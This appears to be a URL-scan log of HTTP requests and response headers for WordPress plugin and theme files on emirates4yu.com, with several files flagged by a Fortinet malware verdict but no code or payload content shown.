emirates4yu.com/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=5.6.4
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=5.6.4
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=5.6.4 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Thu, 27 Oct 2022 10:18:20 GMT
etag: W/"635a5aec-3e7"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4
IP 35.190.203.220:0
GET /wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Fri, 11 Mar 2022 00:15:39 GMT
etag: W/"622a94ab-736"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.6.4
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.6.4
IP 35.190.203.220:0
GET /wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.6.4 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Thu, 27 Oct 2022 10:18:20 GMT
etag: W/"635a5aec-26d1"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/themes/jupiter/header-builder/includes/assets/js/mkhb-render.js?ver=6.1.5
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/themes/jupiter/header-builder/includes/assets/js/mkhb-render.js?ver=6.1.5
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/jupiter/header-builder/includes/assets/js/mkhb-render.js?ver=6.1.5 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sun, 23 Dec 2018 22:54:03 GMT
etag: W/"5c20120b-1951"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.6.4
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.6.4
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.6.4 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Thu, 27 Oct 2022 10:18:20 GMT
etag: W/"635a5aec-aab"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/themes/jupiter/header-builder/includes/assets/css/mkhb-render.css?ver=6.1.5
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/themes/jupiter/header-builder/includes/assets/css/mkhb-render.css?ver=6.1.5
IP 35.190.203.220:0
GET /wp-content/themes/jupiter/header-builder/includes/assets/css/mkhb-render.css?ver=6.1.5 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sun, 23 Dec 2018 22:54:03 GMT
etag: W/"5c20120b-15db"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/themes/jupiter/assets/js/plugins/wp-enqueue/min/webfontloader.js?ver=6.0.3
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/themes/jupiter/assets/js/plugins/wp-enqueue/min/webfontloader.js?ver=6.0.3
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/jupiter/assets/js/plugins/wp-enqueue/min/webfontloader.js?ver=6.0.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sun, 23 Dec 2018 22:54:03 GMT
etag: W/"5c20120b-30d8"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Mon, 11 Apr 2022 12:04:30 GMT
etag: W/"6254194e-194b"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2